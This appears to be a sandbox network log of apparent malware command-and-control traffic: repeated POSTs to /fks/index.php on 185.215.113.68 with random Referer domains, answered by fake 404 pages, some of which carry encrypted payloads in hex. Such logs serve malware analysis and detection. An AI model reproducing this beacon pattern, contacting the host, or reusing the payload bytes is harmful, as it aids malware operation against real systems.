Dec 27, 2023 18:12:48.137948036 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dfayfacsbdbxve.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: 185.215.113.68
Dec 27, 2023 18:12:48.435937881 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:48.474077940 CET	283	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tbhrkrveyha.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: 185.215.113.68
Dec 27, 2023 18:12:48.769972086 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 01 68 78 48 b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 28 3c ff 5b d0 e4 d3 a2 7a 4d 8a a4 75 b4 43 01 52 21 6f 40 51 f8 43 eb 40 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 ff 9b a2 ca 71 83 e8 b9 5f 05 24 18 f7 29 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 20 5e cd e8 b1 55 84 3a a6 47 4e 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe d6 11 e1 47 e4 bc 0f 53 e2 57 df 87 b4 87 d1 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 6f c2 75 6e fd 29 2a b9 dd 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 f8 63 6d 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 fa 97 29 6e ac 51 02 8d e6 24 bd 70 7b 3e 3f 43 d2 34 c9 cc bf 20 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 55 d4 6a 72 f3 79 9b 1d 68 65 1e 20 2c 4e f7 79 22 6a 07 d0 7a 87 76 57 ec fe fd d5 c9 a5 a5 16 b1 ef a0 0f 77 33 40 69 72 55 bb 11 0f e4 4f 38 a1 a2 6d 63 2c 32 02 8b a4 b7 13 15 0e ce 8a 0b 48 04 13 47 4c d7 76 bf b6 94 ec 9f f5 aa b8 26 e6 fe ce 60 20 fa 15 e5 44 55 23 f6 a0 6e 54 f6 04 d0 18 d1 38 33 c8 c9 54 d6 c6 4f 41 27 43 64 c7 46 f0 3c 9d c1 51 b9 72 11 51 c3 f9 e6 7f 22 e9 29 f1 0c 91 a2 85 5e 91 70 a5 62 22 42 c4 45 f6 ab 87 68 0a 76 2b 79 ef 2e ce ad 78 6a 69 6e 75 77 06 c2 f9 35 4f b0 93 43 10 68 3f d2 85 0b f8 fa e3 95 14 a7 81 d1 b9 da 41 61 6a da 44 54 ee e2 1d 4c e3 e5 17 cf 0c ec 0a 7d e1 d0 5b 83 0e f5 e2 fe 83 0f 6a a1 2a 17 d2 2a 44 74 95 84 c3 db c6 64 24 db cb 54 be 8b e4 f7 ab af 89 df 8c e1 b5 2d 3f b9 35 53 46 31 32 ba 7e 15 54 13 0f cf 6a 45 0a 5f 3d d2 ee 75 9b eb b1 76 52 6b 57 4c 93 23 fc fd 61 b8 5a 12 6c 30 34 db 9e e3 c6 e2 bd 0f ce e3 25 05 60 16 f8 0e 21 c5 a4 f1 a3 0b f9 aa b5 38 7c d5 68 63 2c b3 89 fd ec c6 4d 25 b8 1e 88 81 5e f6 aa fb 3b 2a 59 de 2b 2e 6d 83 fd 73 f5 04 c6 ab 80 04 35 91 85 bd bc 6d 81 8a c3 6a ec b2 a5 64 b2 b5 81 4d 02 43 65 de 16 e4 b4 3e 2d 7e 71 2c b7 95 66 28 78 08 05 9d 2e 9d 01 ee b1 96 ce ae 26 d4 ae 19 52 3a 74 25 dd f4 9d c8 e2 16 09 85 6b eb 31 ce d4 0b fb 6e 70 8e fb 76 f1 0a a8 f0 b5 73 d2 6d c3 e7 7d 71 40 05 62 74 a3 11 2c ba d2 8f 41 63 89 6f 2c 33 d8 85 80 43 57 1a 70 82 4b c7 f5 c2 b6 24 cc 3d 77 46 8e 48 7b ab 4f 97 a2 60 14 c6 af f4 ea 60 2b 7b 16 52 b6 c1 ec e8 66 0f ff 43 48 43 22 64 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfhxH!(<[zMuCR!o@QC@@3sPu-\T+1$A/}t<KL<Qrk5c@]Vq_$)svaaAJ,t{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L` ^U:GNO!%LQ2u6xQyGSW@7$lRN9LFtp>coun)d!b~(OYD6Hv}cm;]t)nQ$p{>?C4 3YF w0+.2p0Ujryhe ,Ny"jzvWw3@irUO8mc,2HGLv&` DU#nT83TOA'CdF<QrQ")^pb"BEhv+y.xjinuw5OCh?AajDTL}[jDtd$T-?5SF12~TjE_=uvRkWL#aZl04%`!8\|hc,M%^;Y+.ms5mjdMCe>-~q,f(x.&R:t%k1npvsm}q@bt,Aco,3CWpK$=wFH{O``+{RfCHC"d
Dec 27, 2023 18:12:50.532037020 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fjiswvtndmrnx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 132 Host: 185.215.113.68
Dec 27, 2023 18:12:50.828351974 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:50.879066944 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tmwimmwebtwwpcj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 127 Host: 185.215.113.68
Dec 27, 2023 18:12:51.179619074 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0e e1 c7 14 c2 e5 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff 3d d6 e4 d3 44 7a 4d 8a a4 75 b4 cd 7b 0b 21 6f 40 51 f8 43 0b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 a2 97 24 47 7f fe f8 e8 12 7d c7 74 d7 99 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 d5 e7 a3 ca 6a 83 e8 b9 5f 25 25 18 b7 58 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 71 97 a3 a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 45 84 46 2b a2 59 3e 35 26 1f 18 c2 2b fd 11 df 00 0b bd 33 f6 3e 06 7b 72 f6 1d 02 7c 1b 4c bb a3 eb c9 c9 40 f1 28 44 c2 cb e8 b1 55 84 3a a6 dd 4a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 38 ff 48 ed 3b 71 59 de de 0e e1 47 e4 5c 09 53 e2 19 df 87 b4 2f d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 dd 4b 5a 56 44 05 dd b9 74 70 3e 94 63 41 6e c2 75 6e fd 29 2a 8f d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 82 2d 52 68 c8 bd 08 48 f8 ec 76 de 0c d1 79 02 b8 5d 68 3b 0e 30 02 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 4d c9 56 ce 02 10 3e 3f 45 92 38 c9 cc bb bd a5 33 9b 96 df 1a 17 ef da db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 a5 9c 77 70 b8 5f cb b2 8e 62 4a b3 e4 b2 4d 0c a4 09 88 89 09 2b 75 30 50 1c 6b 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 3c 7a 07 30 5e cd 08 38 98 f4 d1 d3 cd 6f 61 17 9a ee eb 0f 64 ff 6b 79 48 47 bb 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 c4 b7 19 79 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d f0 e8 d8 ab bd 48 13 79 c8 4e 3f 6c 80 31 ca 86 b7 94 c9 ed 8e ab 7e f5 3a 5f 34 6e 06 78 4e 12 ef cf 65 ef 3d 03 af e9 0d f6 6c 49 e4 4b 34 0b 37 8c f7 35 7d 2d 8f 8d c5 16 d9 53 1f ab 0e 97 16 4e af c8 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rf!<=DzMu{!o@QCF@3sPu-\T+$G}t<KL<Qrk5c@]Vj_%%XsvaaAJ,q{p7xhw-SiRg:u jLF>~\|At@mEF+Y>5&+3>{r\|L@(DU:JO'%LQ2u8H;qYG\S/@7$lRN9LKZVDtp>cAnun)d!b~(OY-RhHvy]h;0J]t,n CMV>?E83F wp_bJM+u0Pkryh ,Dz<z0^8oadkyHGK,mc-9qy`GFraF'pDU<-{T&U<U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;*YDme~&jdNhd64%T,u#po.R06x Ynq~mHyN?l1~:_4nxNe=lIK475}-SN
Dec 27, 2023 18:12:54.628341913 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kcbptxsielrxi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: 185.215.113.68
Dec 27, 2023 18:12:54.925946951 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:54.964334011 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frmndmqxxgkhn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 265 Host: 185.215.113.68
Dec 27, 2023 18:12:55.261053085 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:55.522834063 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cbsiqcujebgbft.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: 185.215.113.68
Dec 27, 2023 18:12:55.824950933 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0b e1 d7 3f ab 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1a a3 04 13 3c ff 2f e2 e4 d3 c6 7a 4d 8a a4 75 b4 e3 b5 60 21 6f 40 51 f8 43 0b 72 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 03 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 47 2f 90 ca 69 83 e8 b9 5f 45 21 18 ef 4a 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 46 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 2b ff e8 b1 55 84 3a a6 33 7c 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 0d a1 74 32 79 fe c2 72 e1 47 e4 5c 3d 53 e2 31 df 87 b4 cb e3 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c fb fd 6b 7a 76 64 25 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 0f fa ad 1b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 58 d7 5f 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 76 27 21 6e 80 ad 2b 8d e6 24 bd 70 11 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 dc 03 c3 8f ef 7d 8c f7 37 ed 41 34 71 42 e2 9f e0 c6 6f d1 54 f0 97 1e 19 dd cc 83 ec 16 cf ad 18 9b ed a8 25 45 51 8a a1 b7 8b 41 51 d4 56 ae b2 07 18 de 08 dc 86 ab 21 e0 73 d1 0d be df 30 65 85 fc 82 8e 11 bb f7 5d 53 71 1e 5d 46 3d 29 ba 48 3d 20 1e e3 d4 e6 9f 3b 5d fb b9 8a 33 bb 4b b4 6d a3 ff ff 53 76 8e 84 23 56 32 e9 0e 43 47 9e ba db 5a fc b0 64 dc 0b 52 1f de 9c f4 e7 9c 6b 32 0e bb 52 bf 5e 0d 61 4e 12 ac 04 82 2c 54 9b e0 14 13 f2 42 ce 8a ad 1f d6 f5 b2 34 70 81 c5 40 a5 a1 f9 2f 42 13 f8 5a 7a 0f a1 28 bc a9 7c db fd 8d fa ad 8e c2 1c 1a b3 e1 d3 3f 7b a3 c3 16 27 bd 8b 88 81 10 93 ce d7 42 e8 a9 e3 5c 80 d3 e8 43 f9 d7 6f de 6e 9c 83 2e a5 82 60 ee 60 93 48 59 90 3d 24 13 5e 9c 51 58 a8 33 25 5e b9 34 dd 06 44 09 fd db 7f 28 74 39 52 e4 49 46 89 24 6e 0d 37 97 b5 a6 3b f1 00 41 50 71 e3 8f 45 5e 6f ac 6e 43 3e b6 e3 97 6d f1 4c ae d8 f4 a8 72 f8 2f 55 7b 3e 32 0f 43 de 05 eb fc a1 dd 17 5b b3 8e c3 10 a1 68 6e a0 7e a8 5b 18 f7 3f 84 fc ee 63 ec 4e 9f c7 12 7e 0a 1f 6a 8a 47 73 ee 9c a1 0c c0 7e 9a e5 19 f9 25 ae 0e 63 4b 2d 8f e9 26 66 52 bc 60 00 fa 84 26 06 57 e2 61 83 0f fe 6f 49 be 4b 47 d5 05 94 76 13 3e ca 1f c6 29 2c 60 24 5b 87 b5 08 73 48 5a 0c fd c9 67 c7 3e a4 5f a0 79 fc 97 ff ed f3 51 60 c2 45 e1 f4 fa 77 e9 c9 26 f7 ae 01 4c 51 71 18 e4 a2 c7 04 ac a9 ea 21 52 ba 7e 7e 13 5d 88 32 6a 69 fb f1 a1 58 00 70 31 66 99 4c 2b f8 54 e5 0b 9b fe 36 75 cc eb 3b 99 1c 0e 4f cb f5 23 f2 a7 12 